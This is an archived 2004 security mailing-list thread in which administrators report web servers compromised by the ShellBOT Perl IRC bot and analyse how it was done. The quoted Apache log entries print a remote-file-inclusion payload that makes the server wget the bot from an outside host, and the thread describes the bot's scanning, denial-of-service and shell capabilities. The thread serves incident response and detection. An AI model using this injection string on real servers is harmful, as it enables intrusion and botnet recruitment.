re: Systems compromised with ShellBOT perl script - part 2

security_at_kemhosting.com
Date: 10/20/04

  • Next message: Meder Kydyraliev: "Re: Systems compromised with ShellBOT perl script - part 2" 
    Date: Wed, 20 Oct 2004 00:04:36 -0500
To: incidents@securityfocus.com

    This thread is a couple months old, but I'm having issues with this hack, found
    it in the archives and thought it'd be helpful if I 'resusitated' it. See
    bottom of email for rest of thread.

    Today, hackers used the ShellBOT perl script to bring down Apache and start up
    their IRC listener. They (somehow) copied it into /tmp and executed it. This
    confuses me because I have my /tmp directory mounted rw,noexec,nosuid. Does
    Perl somehow bypass this?

    While the script was running, I ran lsof and found that it had recursively
    accessed all my (virtual host) httpd logs (probably in an attempt to delete
    it's tracks = the reason I can't see how they copied the script into /tmp)
    which are owned by root. this is also confusing since the process the script
    spawned was owned by user apache.

    Some info on my box:
    Redhat ES kernel 2.4.21-9.0.1.ELsmp
    httpd-2.0.46-32.ent
    php-4.3.2-11.ent

    Anyone have any ideas on how this can happen? Mainly the executing of a script
    on a noexec mount! Obviously I'm not a guru, so it's probably something simple
    - so please, share!

    Thanks,
    Ed

    Kirby Angell wrote:

    > Yesterday we noticed a funny looking Apache log entry. It contained:
    >
    >
    http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
    >
    > in the Referer entry. The actual HTTP request was inocuous, but the
    > Referer entry is not. I have been in contact with the owner of the
    > computer that was the apparent target of the attack and he reports that
    > the "index.php" page properly sanitizes its variables to keep this from
    > working.
    >
    > The attack attempts to trick the server into downloading and running the
    > given perl script, ".egg2" in this case. I retrieved a copy of that
    > script and found it configured to log into an IRC server
    > (irc.mzima.net:6667). Once the script is logged in, it joins the
    > channel "#datalink" and then waits for private messages from its
    > handler. The script can perform limited portscans, denial of service
    > attacks, and can run shell commands as whatever user the compromised web
    > server was running as. The script hides its identity by changing it
    > process name to "[httpd]" so it looks like one of many server threads.
    >
    > I logged into the IRC server and joined the channel to find 62
    > compromised systems listening. Unfortunately I was noticed and now the
    > channel is by invitation only. I have notified as many of the
    > administrators for those systems as could be identified from whois
    > records. I have also notified the operators of the IRC server.
    >
    > The IP address of the system that set off the original inquiry is
    > 63.227.76.25. The admin of one of the compromised boxes has found that
    > same IP address involved in their attack too. The Apache log entries
    > from their system look like this:
    >
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0"
    > 200 195
    >
    "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
    > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
    > Firefox/0.9.1"
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET
    > /images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711
    >
    "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
    > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
    > Firefox/0.9.1"
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif
    > HTTP/1.0" 200 2576
    >
    "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2"
    > "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
    > Firefox/0.9.1"
    >
    > I would like to find if he used other IPs, but so far I've only had a
    > few responses from admins of the compromised systems. All who responded
    > were happy to provide log entries though.
    >
    > This sort of script shouldn't be terribly difficult to spot. A "netstat
    > ~ -pan | grep 6667" will show its presence while running. Unless some
    > other compromise is used in conjunction with the script, the cracker
    > will not be able to install any sort of rootkit to hide the script's
    > presence.
    >
    > --
    > Thank you,
    >
    > Kirby Angell
    > Get notified anytime your website goes down!
    > http://www.alertra.com
    > key: 9004F4C0
    > fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0

    ----------------------------------------------------------------
    This message was sent using IMP, the Internet Messaging Program.

  • Next message: Meder Kydyraliev: "Re: Systems compromised with ShellBOT perl script - part 2"

    Relevant Pages

    • Systems compromised with ShellBOT perl script
      ... Yesterday we noticed a funny looking Apache log entry. ... given perl script, ".egg2" in this case. ... I logged into the IRC server and joined the channel to find 62 ... other compromise is used in conjunction with the script, ...
      (Incidents)
    • Re: Systems compromised with ShellBOT perl script - part 2
      ... hackers used the ShellBOT perl script to bring down Apache and start up ... >> The attack attempts to trick the server into downloading and running the ... I have also notified the operators of the IRC server. ... >> few responses from admins of the compromised systems. ...
      (Incidents)
    • Re: HACKED!
      ... Your PHP script could be inscure and someone could have exploited it ... a little more for a provider that allows sftp and ssh. ... compromise happened because FTP was clear text (someone would have to ... protects you from when someone does root a server so they don't know ...
      (comp.lang.javascript)
    • Re: what www perl script is running?
      ... When you run a firewall on a host, you open the ports for the services you want ... that doesn't really add to security at all and may well make you less vigilant. ... Security isn't always about preventing a compromise. ... The part you missed is that the installed script needs to connect out to ...
      (freebsd-questions)
    • Re: Systems compromised with ShellBOT perl script
      ... they'll just mass deface your server. ... > The attack attempts to trick the server into downloading and running the ... Once the script is logged in, ... > other compromise is used in conjunction with the script, ...
      (Incidents)
    • Quantcast